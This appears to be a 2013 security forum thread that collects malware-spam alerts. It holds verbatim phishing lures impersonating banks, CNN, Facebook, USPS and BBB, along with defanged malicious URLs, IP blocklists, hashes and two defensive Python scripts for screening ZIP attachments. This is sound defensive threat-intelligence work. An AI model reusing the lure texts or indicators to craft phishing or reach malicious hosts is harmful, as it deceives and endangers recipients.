The IPs in use identify it as belonging to what I call the Amerika gang*. There are several other malicious domains on these same IPs, and they form part of this larger group of dangerous IPs and domains*.
Recommended blocklist:
66.230.163.86
95.111.32.249
194.42.83.60 ..."
(More listed at the dynamoo URL above.)

* http://blog.dynamoo.com/search/label/Amerika

** http://urlquery.net/report.php?id=4976262
___

Citizens Bank Issue File Processed Spam
- http://threattrack.tumblr.com/post/60376948329/citizens-bank-issue-file-processed-spam
Sep 5, 2013 - "Subjects Seen:
Issue File <random> Processed
Typical e-mail details:
Regarding Issue File <random> -
Total Issue Items # 36 Total Issue Amount $38,043.98
This will confirm that your issue file has been processed. Please verify the information in attached report; if you find there are discrepancies in what you believe your totals should be and what we have reported, please contact the Reconciliation Department at 1-888-333-2909 Option # 3 between the hours of 8:00am and 4:00pm ET not later than 24 hours after you receive this notice.

Malicious File Name and MD5:
issue_report_<random>.zip (1189CEBD553088A94EC3BC2ECB89D34B)
issue_report_<date>.exe (6C66CAE230E0772B75A327AE925F648A)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f5818d25ae6d60cd7ddad29a290953d5/tumblr_inline_mso1f929LQ1qz4rgp.png
___

Websense - Java/Flash research - Dangerous Update Gap...
- http://community.websense.com/blogs/securitylabs/archive/2013/09/05/new-java-and-flash-research-shows-a-dangerous-update-gap.aspx
5 Sep 2013 - "... Nearly 50 percent of -enterprise- traffic used a Java version that was more than two years out of date... Nearly 40 percent of users are not running the most up-to-date versions of Flash... nearly 25 percent of Flash installations are more than six months old, close to 20 percent are outdated by a year and nearly 11 percent are two years old..."

:mad: :sad:

AplusWebMaster
2013-09-06, 16:01
FYI...

Something evil on 37.59.164.209 (OVH)
- http://blog.dynamoo.com/2013/09/something-evil-on-3759164209-ovh.html
6 Sep 2013 - "37.59.164.209 is a server operated by OVH in France. It has many malicious domains hosted on it, indeed almost everything on it is flagged by Google as being malicious (highlighted in the list below). Blocking access to that IP address is the simplest approach as the malicious sites do seem to be in some flux..."
(Long list of URLs at the dynamoo URL above.)

- https://www.virustotal.com/en/ip-address/37.59.164.209/information/
___

CNN Breaking News SPAM: “The United States began bombing!”
- http://threattrack.tumblr.com/post/60455017144/cnn-breaking-news-spam-the-united-states-began
Sep 6, 2013 - "Subjects Seen:
CNN: “The United States began bombing”
Typical e-mail details:
(CNN) — Pentagon officials said that the United States launched the first strikes against Syria. It was dropped about 15 bomn on stalitsu syria Damascus. Full story »
Rescuing Hannah Anderson
*Sushmita Banerjee was kidnapped and killed in Afghanistan, police say
*No one has claimed responsibility for her death, but police suspect militants
*Banerjee wrote “A Kabuliwala’s Bengali Wife” about her escape from the Taliban

Malicious URLs
nevisconservatories .co .uk/soupy/index.html
axsysfinancial .biz/mingle/index.html
holatorino .it/favor/index.html
luggagepoint .de/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9c019d6af9e4c0ccc006be202891c543/tumblr_inline_mspnesVMT61qz4rgp.png

- http://blog.dynamoo.com/2013/09/cnn-united-states-began-bombing-spam.html
6 Sep 2013 - "This fake CNN spam leads to malware on luggagepreview .com:
Date: Fri, 6 Sep 2013 11:30:57 -0600 [13:30:57 EDT]
From: CNN [BreakingNews@ mail .cnn .com]
Subject: CNN: "The United States began bombing"
The United States began bombing!
By Casey Wian, CNN
updated 9:01 AM EDT, Wed August 14, 2013 ...

Screenshot: https://lh3.ggpht.com/-BbuqrJRRbjc/UioW1yo_RwI/AAAAAAAAB50/04oyPrWRzGc/s1600/cnn-bombing.png

The link in the email is meant to go to [donotclick]senior-tek .com/tenth/index.html but the "Full story" link has a typo in and goes to senior-tekcom/tenth/index.html (without the dot) instead which obviously fails. This site then tries to load these three scripts:
[donotclick]crediamo .it/disburse/ringmaster.js
[donotclick]stages2saturn .com/scrub/reproof.js
[donotclick]www.rundherum .at/rabbiting/irritate.js
From there the visitor is sent to a malicious payload at [donotclick]luggagepreview .com/topic/able_disturb_planning.php which is a hacked GoDaddy domain hosted on 174.140.171.207 (DirectSpace LLC, US) along with several other hijacked domains...
Recommended blocklist:
174.140.171.207 ..."

- https://www.virustotal.com/en/ip-address/174.140.171.207/information/

- http://www.symantec.com/connect/fr/blogs/chemical-attack-syria-used-enticement-targeted-attack
6 Sept 2013
___

"Scanned Document Attached" SPAM / FSEMC.06092013.exe
- http://blog.dynamoo.com/2013/09/scanned-document-attached-spam.html
6 Sep 2013 - "This fake financial spam contains an encrypted attachment with a malicious file in it.
Date: Fri, 6 Sep 2013 15:19:37 +0000 [11:19:37 EDT]
From: Fiserv [Lawanda_Underwood@ fiserv .com]
Subject: FW: Scanned Document Attached
Dear Business Associate:
Protecting the privacy and security of client, company, and employee
information is one of our highest priorities. That is why Fiserv has
introduced the Fiserv Secure E-mail Message Center - a protected e-mail
environment designed to keep sensitive and confidential information
safe. In this new environment, Fiserv will be able to send e-mail
messages that you retrieve on a secured encrypted file.
You have an important message from Adam_Paul@ fiserv .com
To see your message, use the following password to decrypt attached file: JkSIbsJPPai
If this is your first time receiving a secure file from the
Fiserv Secure E-mail Message Center, you will be prompted to set up a
user name and password.
This message will be available until Saturday Sep 07, 2013 at 17:50:42
EDT4
If you have any questions, please contact your Fiserv representative...

Attached is an encrypted ZIP file which contains part of the victim's email address (or somebody else in the same domain) that has to be decrypted with the password JkSIbsJPPai. This in turn contains a malicious executable FSEMC.06092013.exe (note the date is encoded into the filename). The VirusTotal detection rate for this malware is only 6/47*. The malware then phones home to a site ce-cloud.com:443 hosted on 84.22.177.37 (ioMart, UK) and then uploads some data... What happens next is unclear, but you can guarantee that it is nothing good. Blocking access to ce-cloud .com or 84.22.177.37 may provide some protection. Blocking EXE-in-ZIP files is an even more effective approach if you can do it."
* https://www.virustotal.com/en/file/6fcd54235ec7883cd551d9f8b043d5b9ce82832e0e476c8b2c4a79e5f228eb30/analysis/1378501983/
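Two points from the posts above are worth turning into a mail-gateway check: the HSBC sample used a .scr that was really a renamed .EXE, and the Fiserv sample hid its executable in a password-protected ZIP, with the blog noting that blocking EXE-in-ZIP is the most effective defence. The Python below is an added example (not code from dynamoo or this forum) that inspects a ZIP attachment and flags executable extensions and PE ("MZ") headers. Because the ZIP central directory is not encrypted, member names are visible even in a passworded archive, so the name check still fires there while the header check is skipped. The sample archive is constructed in memory with a fake PE stub and is unencrypted; the extension list is an assumption.

```python
import io
import zipfile

# Extensions that should never arrive inside a mail attachment (assumed policy list).
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".jar"}
PE_MAGIC = b"MZ"  # DOS/PE header shared by .exe and .scr files


def inspect_zip(data: bytes) -> list:
    """Return one finding per archive member: name, encrypted flag, extension and PE-header verdicts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            encrypted = bool(info.flag_bits & 0x1)  # bit 0 of the general purpose flag
            finding = {
                "name": name,
                "encrypted": encrypted,
                "suspicious_extension": ext in EXECUTABLE_EXTENSIONS,
                "pe_header": None,  # unknown when the member is encrypted
            }
            if not encrypted:
                with zf.open(info) as fh:
                    finding["pe_header"] = fh.read(2) == PE_MAGIC
            findings.append(finding)
    return findings


def should_block(findings) -> bool:
    """Block when any member has an executable extension or a PE header, whatever its extension says."""
    return any(f["suspicious_extension"] or f["pe_header"] for f in findings)


def build_sample_zip() -> bytes:
    """Constructed sample: a fake PE stub under two names plus a harmless text file."""
    fake_pe = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 32  # not a real executable
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Original Copy (Edited).scr", fake_pe)  # renamed EXE, as in the HSBC sample
        zf.writestr("invoice.pdf", fake_pe)                  # PE hiding behind a document extension
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()


if __name__ == "__main__":
    results = inspect_zip(build_sample_zip())
    for r in results:
        print(r)
    print("block attachment:", should_block(results))
```

The "invoice.pdf" member shows why the header check matters alongside the extension list: a renamed executable passes the name test but not the magic-byte test. For an encrypted archive only the name test runs, which is exactly why the Fiserv spam puts the password in the mail body and a date-stamped .exe inside.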
___

More new Facebook SPAM / www .facebook.com.achrezervations .com
- http://blog.dynamoo.com/2013/09/facebook-spam-wwwfacebookcomachrezervat.html
6 Sep 2013 - "This fake Facebook spam leads to malware on www .facebook.com.achrezervations .com:
Date: Fri, 6 Sep 2013 08:07:14 -0500 [09:07:14 EDT]
From: Facebook [notification+puppies9@ mail .facebookmail .net]
Reply-To: noreply [noreply@ postmaster .facebookmail .org]
Subject: Cole Butler confirmed your Facebook friend request
facebook
Cole Butler has confirmed that you're friends on Facebook.
You may know some of Cole's Friends
Daren Douglas
1 mutual friends
Add Friend
Gertrude Souza
14 mutual friends
Add Friend
Brice Kelly
3 mutual friends
Add Friend ...
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please unsubscribe...

Screenshot: https://lh3.ggpht.com/-vdq1WhJkOzY/Uinn23pxApI/AAAAAAAAB5k/mb7uFKXCU2I/s1600/facebook.png

The link in the email goes to a legitimate -hacked- site and then to an exploit kit on [donotclick]www.facebook.com.achrezervations .com/news/implement-circuit-false.php (report here*) hosted on the following servers:
66.230.163.86 (Goykhman And Sons LLC, US)
95.111.32.249 (Megalan / Sofia Mobiltel EAD, Bulgaria)
115.78.233.220 (Vietel Corporation, Vietnam)
194.42.83.60 (Interoute Hosting, UK)
The following IPs and domains are all malicious and belong to this gang**, I recommend you block them:
66.230.163.86
95.111.32.249
115.78.233.220
194.42.83.60 ..."
(More URLs listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=4996887

** http://blog.dynamoo.com/search/label/Amerika
___

Threat Outbreak Alerts cover the latest data regarding malicious email-based and web-based threats, including spam, phishing, viruses, malware, and botnet activity.
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Account Payment Notification Email Messages - 2013 Sep 06
Fake Bank Payment Transfer Notification Email Messages - 2013 Sep 06
Fake Product Quote Email Messages - 2013 Sep 06
Fake Order Payment Confirmation Email Messages - 2013 Sep 05
Fake Airline Ticket Order Notification Email Messages - 2013 Sep 05
Email Messages with Malicious Link - 2013 Sep 05
Fake Photo Sharing Email Messages - 2013 Sep 05
Fake Money Transfer Notification Email Messages - 2013 Sep 05
Malicious Personal Pictures Attachment Email Messages - 2013 Sep 05
Fake Product Order Confirmation Email Messages - 2013 Sep 05
Fake Invoice Notification Email Messages - 2013 Sep 05
Fake Document Attachment Email Messages - 2013 Sep 05
Fake Shipping Notification Email Messages - 2013 Sep 05
Email Messages with Malicious Attachments - 2013 Sep 05
Fake Shipping Confirmation Email Messages - 2013 Sep 05
Fake Scanned Document Attachment Email Messages - 2013 Sep 05
Fake Product Purchase Request Email Messages - 2013 Sep 05
Fake Personal Picture Sharing Email Messages - 2013 Sep 05
Fake Product Order Email Messages - 2013 Sep 05
Fake Electronic Payment Cancellation Email Messages - 2013 Sep 05
(More detail and links available at the cisco URL above.)

:mad: :fear::fear:

AplusWebMaster
2013-09-07, 19:07
FYI...

Quotation.zip SPAM with malicious VBS script
- http://blog.dynamoo.com/2013/09/dealerbidcouk-quotationzip-spam-with.html
7 Sep 2013 - "The website dealerbid.co .uk has been compromised and their servers -hacked- in order to send spam to their customer list. Something similar happened a few months ago*. In this case the spam email was somewhat mangled, but I am assuming that the spammers know how to fix this. The spam email is as follows:
From: Christopher Rawson [christopher.r@ kema .com]
Date: 7 September 2013 14:04
Subject: Quotation
Hello,
We have prepared a quotation, please see attached
With Kind Regards,
Christopher Rawson,
DNV KEMA Energy & Sustainability ...

DNV KEMA is a real, legitimate company in the energy sector. But they did not send the spam; an examination of the headers shows that the sending IP is 213.171.204.75, which is the same IP as www .dealerbid .co .uk and mail.dealerbid .co .uk. The email is sent to an address ONLY used to register at dealerbid .co .uk. So, the upshot is that this domain is compromised and it is compromised right now. The email is meant to have an attachment called Quotation.zip but in my sample the email was mis-formatted and instead the Base 64 encoded ZIP file was in the main body text... Some copy-and-pasting and work with a Base 64 decoder ended up with a valid ZIP file, containing a somewhat obfuscated VBS script Quotation.vbs with a low VirusTotal detection rate of 4/46**... it attempts to download further components from klonkino.no-ip .org (port 1804) which is hosted on 146.185.24.207 (Hosting Services Inc, UK). I strongly recommend blocking no-ip .org domains in any case, but I certainly recommend the following blocklist:
klonkino.no-ip .org
146.185.24.207 ... "

* http://blog.dynamoo.com/2013/03/dealerbidcouk-spam.html

** https://www.virustotal.com/en/file/46472cd1655cc46dc31b026960edf6b50afa9384a9d8e83d63e2eb73d5230f02/analysis/1378571897/

- https://www.virustotal.com/en/ip-address/146.185.24.207/information/
___

Adware spread with Mevade variants ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/us-taiwan-most-affected-by-mevade-malware/
Sep 6, 2013 - "... rise in the number of Tor users... directly attributed to the Mevade malware... The first batch of Mevade samples (detected as BKDR_MEVADE.A) we gathered was downloaded by a malicious file named FlashPlayerUpdateService.exe (detected as TROJ_DLOADE.FBV). (The legitimate Flash updater uses the same file name.) The two files can be differentiated by examining the file properties. The legitimate version is signed, while the malicious version is not. In addition, the version numbers are different... The backdoor communicates to its C&C server via HTTP to receive commands, which include updating a copy of itself and connecting to a specific location using SSH to secure its communication... The IP addresses that host these C&C servers are located in Russia. Looking into the feedback data provided by the Smart Protection Network, TROJ_DLOADE.FBV was found in multiple countries, with Japan and the United States being the most affected... In addition to the Mevade malware itself, we saw that ADW_BPROTECT had also been downloaded onto affected systems. This is expected for Mevade, as we noted earlier that it is linked to cybercriminals responsible for the distribution of adware. This downloading of adware is consistent with our findings that the Mevade botnet is possibly monetized via installing -adware- and -toolbars- ... Newer versions of Mevade (BKDR_MEVADE.B and BKDR_MEVADE.C) no longer use SSH; instead they use the Tor network to hide their network traffic. This can help cover their activity online, but otherwise the behavior and propagation is identical... How the malware arrives into the system, however, is still under investigation. We will update the blog should we find more information about the infection vector. Still, users must observe best computing practice and -avoid- visiting and downloading files from unverified websites or links from email, social media etc..."

:mad: :fear::fear:
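For the mangled dealerbid.co .uk email above, where the ZIP attachment ended up base64-encoded in the body text and had to be decoded by hand, here is an added triage script (not from the dynamoo post or this thread) that pulls such blobs out of a message body, checks for the ZIP signature and flags script or executable members without extracting or running anything. The sample email body and its placeholder Quotation.vbs are constructed for the example.

```python
"""Triage of a spam email whose ZIP attachment arrived base64-encoded in the
body text instead of as a MIME part (the Quotation.zip / Quotation.vbs case)."""
import base64
import binascii
import io
import re
import zipfile

# Extensions that have no business inside a "quotation" archive.
RISKY_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".exe", ".scr", ".bat", ".cmd"}

# A body line that is nothing but base64 text (MIME wraps such lines at 76 chars).
_B64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _base64_runs(body):
    """Yield each run of consecutive base64-only lines in the body, joined."""
    run = []
    for line in body.splitlines():
        line = line.strip()
        if line and _B64_LINE.match(line):
            run.append(line)
            continue
        if run:
            yield "".join(run)
            run = []
    if run:
        yield "".join(run)


def extract_embedded_zips(body):
    """Return every base64 run in the body that decodes to a ZIP archive."""
    zips = []
    for blob in _base64_runs(body):
        if len(blob) < 64:                     # too short to be an archive
            continue
        blob += "=" * (-len(blob) % 4)         # repair padding lost in transit
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw.startswith(b"PK\x03\x04"):      # ZIP local file header magic
            zips.append(raw)
    return zips


def triage_zip(raw):
    """List archive members and flag script/executable payloads. Nothing is
    extracted to disk or executed."""
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        members = zf.namelist()
    flagged = [m for m in members
               if "." + m.rsplit(".", 1)[-1].lower() in RISKY_EXTENSIONS]
    return {"members": members, "flagged": flagged, "suspicious": bool(flagged)}


def triage_email(body):
    """Triage report for every ZIP found base64-encoded in the message body."""
    return [triage_zip(raw) for raw in extract_embedded_zips(body)]


def make_sample_body(member_name, member_text):
    """Constructed sample: a one-file ZIP, base64-encoded and dumped into the
    body text the way the mangled spam did it. Placeholder content only,
    not the real Quotation.vbs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, member_text)
    b64 = base64.encodebytes(buf.getvalue()).decode("ascii")  # 76-char lines
    return ("Hello,\r\nWe have prepared a quotation, please see attached\r\n"
            "With Kind Regards,\r\n\r\n" + b64 + "\r\nChristopher Rawson\r\n")


SAMPLE_EMAIL = make_sample_body("Quotation.vbs", "' placeholder script body\r\n")

if __name__ == "__main__":
    for report in triage_email(SAMPLE_EMAIL):
        print(report)
```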

AplusWebMaster
2013-09-09, 18:57
FYI...

Malware sites to block 9/9/13
- http://blog.dynamoo.com/2013/09/malware-sites-to-block-9913.html
9 Sep 2013 - "These domains and IPs are associated with this gang*, this list supersedes (or complements) the one I made last week**..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika

** http://blog.dynamoo.com/2013/09/malware-sites-to-block-2913.html
___

Malware sites to block 9/9/13, part II
- http://blog.dynamoo.com/2013/09/malware-sites-to-block-9913-part-ii.html
9 Sep 2013 - "Another set of IPs and domains related to this attack* detailed by Sophos, and overlapping slightly with the malicious servers documented here**. I've just listed the main domains, but the attack itself uses thousands of subdomains (e.g. zwgaf72d4erv7g.www5.tohk5ja .cc) to do evil things.
46.20.36.9 (Syslayer.com, Germany)
74.63.229.252 (Limestone Networks / 123systems Solutions, US)
77.81.244.226 (Elvsoft SRL, Netherlands)
173.243.118.198 (Continuum Data Centers, US)
198.52.243.229 (Centarra Networks, US)
199.188.206.183 (Namecheap Inc, US)
206.72.192.31 (Interserver Inc, US)
213.156.91.110 (Ukrainian Special Systems Network, Ukraine)
Blocklist:
46.20.36.9
74.63.229.252
77.81.244.226
173.243.118.198
198.52.243.229
199.188.206.183
206.72.192.31
213.156.91.110 ..."
(Long list at the dynamoo URL above.)
* https://secure2.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ADKW/detailed-analysis.aspx

** http://blog.dynamoo.com/2013/09/malware-sites-to-block-9913.html
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Shipping Notification Email Messages - 2013 Sep 09
Fake Processed Payment Notification Email Messages - 2013 Sep 09
Fake Account Payment Notification Email Messages - 2013 Sep 09
Fake Important Documents Notification Email Messages - 2013 Sep 09
Fake Anti-Phishing Email Messages - 2013 Sep 09
Fake Product Order Email Messages - 2013 Sep 09
Fake Real Estate Inquiry Email Messages - 2013 Sep 09
Fake Bank Payment Transfer Notification Email Messages - 2013 Sep 09
Fake Shipping Confirmation Email Messages - 2013 Sep 09
Fake Bank Transfer Notice Email Message - 2013 Sep 09
Fake Invoice Statement Attachment Email Messages - 2013 Sep 09
Fake Product Order Quotation Email Messages - 2013 Sep 09
Fake Business Complaint Notification Email Messages - 2013 Sep 09
Fake Product Purchase Order Email Messages - 2013 Sep 09
Fake Product Order Request Email Messages - 2013 Sep 09
Fake Letter of Intent Attachment Email Messages - 2013 Sep 09
Fake Product List Attachment Email Messages - 2013 Sep 09
Fake Account Deposit Notification Email Messages - 2013 Sep 09
Malicious Personal Pictures Attachment Email Messages - 2013 Sep 09
Fake Purchase Order Request Email Messages - 2013 Sep 09
(More detail and links at the cisco URL above.)

:mad::fear:

AplusWebMaster
2013-09-10, 17:52
FYI...

Fake FISC ACH SPAM / fiscdp.com.airfare-ticketscheap .com
- http://blog.dynamoo.com/2013/09/ach-file-id-999107-has-been-processed.html
10 Sep 2013 - "This fake FISC ACH spam leads to malware on www .fiscdp .com.airfare-ticketscheap .com:
Date: Tue, 10 Sep 2013 17:05:49 +0530 [07:35:49 EDT]
From: Financial Institution Service [improvehv89@ m.fiscdp .gov]
Subject: ACH file ID "999.107" has been processed successfully
Files FISC Processing Service
SUCCESS Notification
We have successfully handled ACH file 'ACH2013-09-09-62.txt' (id '999.107') submitted by user '[redacted]' on '2013-09-09 12:06:67.7'.
FILE SUMMARY:
Item count: 9
Total debits: $13,365.83
Total credits: $13,365.83 ...

Screenshot: https://lh3.ggpht.com/-Iz3whiN6ueg/Ui8p3ZBdj8I/AAAAAAAAB6U/vbU8dZM88fM/s400/fisc.png

The link in the email goes to a legitimate -hacked- site and then on to a malware landing page at [donotclick]www.fiscdp .com.airfare-ticketscheap .com/news/opens_heads_earlier.php (reports here* and here**) hosted on:
66.230.163.86 (Goykhman And Sons LLC, US)
95.87.1.19 (Trakia Kabel OOD, Bulgaria)
174.142.186.89 (iWeb Technologies)
The WHOIS details for airfare-ticketscheap .com are -fake- and the domain was registered just yesterday... The IPs in use indicate that this campaign forms part of the Amerika spam run. Several other malicious sites are on the same server, and I would recommend that you block the following in conjunction with this list:
66.230.163.86
95.87.1.19
174.142.186.89 ..."
(More URLs listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=5071327

** http://wepawet.iseclab.org/view.php?hash=475d28a937b23a953b975e1f28ecf035&t=1378821965&type=js

- https://www.virustotal.com/en/ip-address/174.142.186.89/information/
___

Fake BBB SPAM / Case_0938818_2818.exe
- http://blog.dynamoo.com/2013/09/bbb-spam-case09388182818exe.html
10 Sep 2013 - "This fake BBB spam has a malicious attachment:
Date: Tue, 10 Sep 2013 15:07:14 +0100 [10:07:14 EDT]
From: Better Business Bureau [Aldo_Austin@ newyork .bbb .org]
Subject: FW: Case IN11A44X2WCP44M
The Better Business Bureau has received the above-referenced complaint from one of your
customers regarding their dealings with you. The details of the consumer's concern are
included on the reverse. Please review this matter and advise us of your position.
As a neutral third party, the Better Business Bureau can help to resolve the matter.
Often complaints are a result of misunderstandings a company wants to know about and
correct.
In the interest of time and good customer relations, please provide the BBB with written
verification of your position in this matter by September 13, 2013. Your prompt response
will allow BBB to be of service to you and your customer in reaching a mutually agreeable
resolution. Please inform us if you have contacted your customer directly and already
resolved this matter.
The Better Business Bureau develops and maintains Reliability Reports on companies across
the United States and Canada . This information is available to the public and is
frequently used by potential customers. Your cooperation in responding to this complaint
becomes a permanent part of your file with the Better Business Bureau. Failure to
promptly give attention to this matter may be reflected in the report we give to
consumers about your company.
We encourage you to print this complaint (attached file - Case_IN11A44X2WCP44M), answer
the questions and respond to us.
We look forward to your prompt attention to this matter.
Sincerely,
Aldo_Austin
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201

Attached to the message is a ZIP file Case_IN11A44X2WCP44M.zip which in turn contains an executable Case_0938818_2818.exe which has a shockingly low detection rate of just 1/46* at VirusTotal. Automated analysis of the malware is inconclusive... but it does generate outbound traffic to kwaggle .com port 443 on 64.50.166.122 (Lunar Pages, US). The domain thisisyourwife .co .uk on the same server is also hosting malware; I would therefore be suspicious about some of the other sites on the same box.
Recommended blocklist:
64.50.166.122
kwaggle .com
thisisyourwife .co .uk "
* https://www.virustotal.com/en-gb/file/dac2e647bbeadaa7b33ef264f2cbf43d9f3469533b42bc12c9d2e9d4e5d1046c/analysis/1378823569/

- https://www.virustotal.com/en/ip-address/64.50.166.122/information/

:fear::mad:

AplusWebMaster
2013-09-11, 18:43
FYI...

Threats - Online Bullying ...
- http://www.threattracksecurity.com/it-blog/ask-fm-threats-go-beyond-online-bullying/
Sep 11, 2013 - "Three weeks ago... co-founders of social networking site Ask.fm, released a statement regarding some changes on the site’s safety policy in an effort to curb the dramatic increase of cyberbullying occurrences within its platform. Ask.fm boasts at least 57 million registered users, the majority of which are teens and tweens. The site’s anonymity feature has sadly become the means for some users to deliberately target and verbally assault others. The proposed changes are no quick fix, nor are they remedies to the deeper problems of what motivates one to bully someone online. However, I believe that it’s a good first step to achieve the objective. Giving users the option to opt out of accepting and entertaining anonymous questions and/or comments could be a big blow to trolls. Some victims of online bullying in Ask.fm have taken it upon themselves to resolve the matter of anonymity by attempting to unmask who these people are. How? They look for tools online... that will lead to trouble... We have come across a number of sites hosting files that -pretend- to unmask Ask.fm users. Upon closer inspection, however, they’re malicious in nature at worst. These files can range from simple malware droppers to Bitcoin miners to PUPs bearing a gamified marketing tactic or something more dubious.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/06A8F73D66FA9256970848DFA6ABA7AD.jpg
Sadly, such files like the above are easy to find. Users who find themselves installing -any- of these files on their computer will discover that they got something more than what they bargained for..."
___

Fake USPS SPAM / Label_FOHWXR30ZZ0LNB1.zip
- http://blog.dynamoo.com/2013/09/usps-spam-labelfohwxr30zz0lnb1zip.html
11 Sep 2013 - "This fake USPS spam has a malicious attachment:
Date: Wed, 11 Sep 2013 11:19:05 -0500 [12:19:05 EDT]
From: USPS Express Services [service-notification @usps .com]
Subject: USPS - Missed package delivery
Priority: High Priority 1 (High)
Notification
Our company's courier couldn't make the delivery of package.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: Sort Order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: UGLFOHWXR30ZZ0LNB1
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
USPS Global...

There is an attachment Label_FOHWXR30ZZ0LNB1.zip which in turn contains an executable Label_368_09112013_JDSL.exe which has a very low detection rate at VirusTotal of just 2/47*... attempted connection to a -hijacked- GoDaddy domain drippingstrawberry .com hosted on 64.50.166.122 (LunarPages, US) with quite a lot of other hijacked domains. Blocking or monitoring traffic to this IP could stop the infection; URLquery shows** some of the things going on with this server.
Recommended blocklist:
64.50.166.122 ..."
(More URLs listed at the dynamoo URL above.)
* https://www.virustotal.com/en/file/e895123dfed32e5855c2d91f3f9d6410633b84020bead54086f47ce687a5e70a/analysis/1378926663/

** http://urlquery.net/search.php?q=64.50.166.122&type=string&start=2013-08-27&end=2013-09-11&max=50

- https://www.virustotal.com/en/ip-address/64.50.166.122/information/
___

Xerox WorkCentre Pro SPAM
- http://threattrack.tumblr.com/post/60947146663/xerox-workcentre-pro-spam
Sep 11, 2013 - "Subjects Seen:
Scanned Image from a Xerox WorkCentre
Typical e-mail details:
Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.
Sent by: <e-mail domain>
Number of Images: 3
Attachment File Type: ZIP [PDF]
WorkCentre Pro Location: Machine location not set
Device Name:
Attached file is scanned image in PDF format.

Malicious File Name and MD5:
Scan_<random>.zip (1BE34606E5B1D54C5E394982A3DD8965)
scanned_doc_<date>.exe (2E318671CEC024166586943AD04520C1)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a1d06659e9d1e04299fc707dcb569734/tumblr_inline_msz3pw9f951qz4rgp.png
___

Fake AVG Android Apps ...
- http://blogs.avg.com/mobile-2/examples-fake-avg-android-apps/
Sep 9, 2013 - "Our mobile security research team has found at least 33 applications that contain aggressive advertising components in the official Google Play store. The developers of these applications choose to imitate well-known companies like Google, Microsoft, Twitter, AVG among others. Here’s an example of some applications found in Google Play:
> http://blogs.avg.com/wp-content/uploads/2013/09/Image-11.png
... Below you can see another example of a -fake- AVG anti-virus app that can be found in Google Play:
> http://blogs.avg.com/wp-content/uploads/2013/09/Image-6.png
Remember, if you want to pay for a PRO version of an app, you absolutely must make sure that it is the legitimate version of the app you’re looking for... When you install one of these fake applications, it requests the user to change configurations related to the search options:
> http://blogs.avg.com/wp-content/uploads/2013/09/Image-31.png
After the user accepts the conditions, commercials for adult services are shown:
> http://blogs.avg.com/wp-content/uploads/2013/09/Image-4.png
Later, the app itself offers none of the functionality advertised (such as antivirus protection). This is a new advertising vector that takes advantage of people who might not be familiar with official company accounts... when you look for AVG’s Android solutions on Google Play you might find apps that are -not- released by AVG (the official developer is AVG Mobile) but from opportunistic scammers..."

- http://www.fireeye.com/blog/technical/2013/09/android-malware.html
Sep 10, 2013 - "... Before the advent of advanced malware, we used to see a bunch of fake AV on the windows platform... the same thing will happen in the case of Android malware, where eventually we will start seeing more serious and advanced techniques being employed in mobility. To protect yourself from malicious Android applications, please follow these simple steps:
1. Disable the “Allow installation of apps from Unknown Sources” setting.
2. Always install apps from trusted app markets."

:mad: :sad:

AplusWebMaster
2013-09-12, 22:34
FYI...

Fake QuickBooks SPAM / Invoice_20130912.zip
- http://blog.dynamoo.com/2013/09/quickbooks-spam-invoice20130912zip.html
12 Sep 2013 - "This fake QuickBooks spam has a malicious attachment:
Date: Thu, 12 Sep 2013 20:29:17 +0200 [14:29:17 EDT]
From: QuickBooks Invoice [auto-invoice@ quickbooks .com]
Subject: Important - Payment Overdue
Please find attached your invoices for the past months. Remit the payment by 09/16/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Quentin Sprague ...

The attachment is Invoice_20130912.zip which in turn contains a malicious executable Invoice_20130912.exe (note the date is encoded into the filename). The detection rate at VirusTotal is just 3/46*... the file attempts to communicate with the domain leightongriffiths .com on an apparently compromised server at 64.50.166.122 which has been seen before. Given that there are now several domains serving malware on the same server**... it is probably safe to assume that all the domains on that server are malicious and should be blocked.
Recommended blocklist:
64.50.166.122 ..."
* https://www.virustotal.com/en/file/5ac94782513f480dec9c6661559aedcf88ed67f812abc716ad52285e28f75234/analysis/1379012535/

** https://www.virustotal.com/en/ip-address/64.50.166.122/information/
___

Fake Online Message - Mint Internet Banking
- http://security.intuit.com/alert.php?a=86
9/12/13 - "People are receiving fake emails with the title "Online Message from Mint Internet Banking" ...
> http://security.intuit.com/images/mint.jpg
... This is the end of the fake email.
Steps to Take Now
Do not open the attachment in the email...
Delete the email..."
___

